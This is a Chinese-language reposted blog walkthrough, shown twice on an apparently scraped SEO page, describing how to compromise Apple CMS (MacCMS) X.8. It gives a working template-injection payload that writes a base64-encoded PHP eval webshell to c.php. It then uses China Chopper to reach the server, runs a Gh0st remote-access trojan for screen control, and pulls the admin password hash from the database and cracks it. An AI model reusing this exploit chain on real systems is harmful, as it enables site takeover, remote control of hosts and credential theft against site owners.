苹果CMS X.8如何修改设置以获取管理员权限?

2026-04-02 01:321阅读0评论SEO资讯
  • 内容介绍
  • 文章标签
  • 相关推荐

本文共计476个文字,预计阅读时间需要2分钟。

苹果CMS X.8如何修改设置以获取管理员权限?

使用工具火狐插件的Hackbar,结合中国菜刀gh0st,可挖掘苹果CMS历史漏洞。详情请见:https://blog.csdn.net/m0_37438418/article/details/%E7%94%A8%E5%88%B0%E7%9A%84%E5%B7%A5%E5%85%B7%20%2B%20%E7%81%AB%E7%8B%90%E6%8F%92%E4%BB%B6hackbar%20%2B%20%E4%B8%AD%E5%9B%BD%E8%8F%9C%E5%88%80%20%2B%20gh0st%20%2B%20%E8%8B%B9%E6%9E%9C%20cms%20%2B%20%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E

用到的工具火狐插件hackbar中国菜刀gh0st苹果cms历史漏洞blog.csdn.net/m0_37438418/article/details/81006161

操作步骤

  • 下载火狐插件 hackbar 在苹果 cms 的主页搜索界面临时搭的站 192.168.0.137/

    • 2.按下 F12 点 HackBar 选择 Post data 填写如下内容点击 Execute 按钮

    ·192.168.0.137/index.PHP?mvod-search·wd{if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

    PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x MD5解密1 就是创建 c.php 传入参数 c

    苹果CMS X.8如何修改设置以获取管理员权限?

    3.打开中国菜刀右键 -> 添加 。输入以下内容 4. 找到 config.php 文件打开 5.打开 Gh0st 。选项 -> 创建客户 输入以下信息后测试连接 在这里需要查找合适的端口尽量选择数字大的端口查看此端口是否被占用如果被占用则结束占用此端口的进程

  • 如果测试连接成功点击 “生成” 按钮 将木马文件保存。
  • 把 server.exe 放入菜刀直接拖进去
  • 打开菜刀 右键 -> 虚拟终端 输入 server.exe 执行木马文件。之后会在Gh0st 下看到被连接的用户。
  • 右键 -> 屏幕控制 右键 -> 控制屏幕 。 打开 Phpstudy -> MySQL 管理器 -> MySQL-Front 10 找到在config.php 里对应的数据库名 “maccms” 打开可疑的表 “mac_manager”

    • 管理员账号admin 管理员密码a66abb5684c45962d887564f08346e8d 解密后admin123456

    登录后台 成功

    标签:工具火狐

    相关推荐

    26911PHP中get_html_translation_table()函数如何用于HTML字符转义?26912PHP-FPM如何进行高效管理和详细配置?26924如何通过PHP调用全国天气预报API获取指定城市未来一周的详细天气信息?26927如何用Yii2.0框架实现长尾词的多条件搜索并分页?26931如何使用file_get_contents()函数高效获取文件内容?26938PHP中如何使用hex2bin()函数将十六进制字符串转换为二进制字符串?26939PHP中的html_entity_decode()函数如何正确解码HTML实体?26943PHP中引用类型和值类型如何实现及其具体应用场景有哪些?26950如何将CI框架中的URL特殊字符处理与SQL注入防范巧妙融合?26951如何解决PHP微信发送推送消息乱码问题?26957如何将PHP递归的三种常用方式改写成长尾?26960如何用PHP和jQuery AJAX实现上传多张图片并限制图片大小?26965PHP中如何使用常见的字符串函数进行高效字符串操作?26970如何解决因使用composer导致的一次性错误引发的问题?26973如何通过PHP获取ttf字体文件的字体名称?26984如何用PHP实现会员账号单唯一登录的详细方法?

    本文共计476个文字,预计阅读时间需要2分钟。

    苹果CMS X.8如何修改设置以获取管理员权限?

    使用工具火狐插件的Hackbar,结合中国菜刀gh0st,可挖掘苹果CMS历史漏洞。详情请见:https://blog.csdn.net/m0_37438418/article/details/%E7%94%A8%E5%88%B0%E7%9A%84%E5%B7%A5%E5%85%B7%20%2B%20%E7%81%AB%E7%8B%90%E6%8F%92%E4%BB%B6hackbar%20%2B%20%E4%B8%AD%E5%9B%BD%E8%8F%9C%E5%88%80%20%2B%20gh0st%20%2B%20%E8%8B%B9%E6%9E%9C%20cms%20%2B%20%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E

    用到的工具火狐插件hackbar中国菜刀gh0st苹果cms历史漏洞blog.csdn.net/m0_37438418/article/details/81006161

    操作步骤

  • 下载火狐插件 hackbar 在苹果 cms 的主页搜索界面临时搭的站 192.168.0.137/

    • 2.按下 F12 点 HackBar 选择 Post data 填写如下内容点击 Execute 按钮

    ·192.168.0.137/index.PHP?mvod-search·wd{if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

    PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x MD5解密1 就是创建 c.php 传入参数 c

    苹果CMS X.8如何修改设置以获取管理员权限?

    3.打开中国菜刀右键 -> 添加 。输入以下内容 4. 找到 config.php 文件打开 5.打开 Gh0st 。选项 -> 创建客户 输入以下信息后测试连接 在这里需要查找合适的端口尽量选择数字大的端口查看此端口是否被占用如果被占用则结束占用此端口的进程

  • 如果测试连接成功点击 “生成” 按钮 将木马文件保存。
  • 把 server.exe 放入菜刀直接拖进去
  • 打开菜刀 右键 -> 虚拟终端 输入 server.exe 执行木马文件。之后会在Gh0st 下看到被连接的用户。
  • 右键 -> 屏幕控制 右键 -> 控制屏幕 。 打开 Phpstudy -> MySQL 管理器 -> MySQL-Front 10 找到在config.php 里对应的数据库名 “maccms” 打开可疑的表 “mac_manager”

    • 管理员账号admin 管理员密码a66abb5684c45962d887564f08346e8d 解密后admin123456

    登录后台 成功

    标签:工具火狐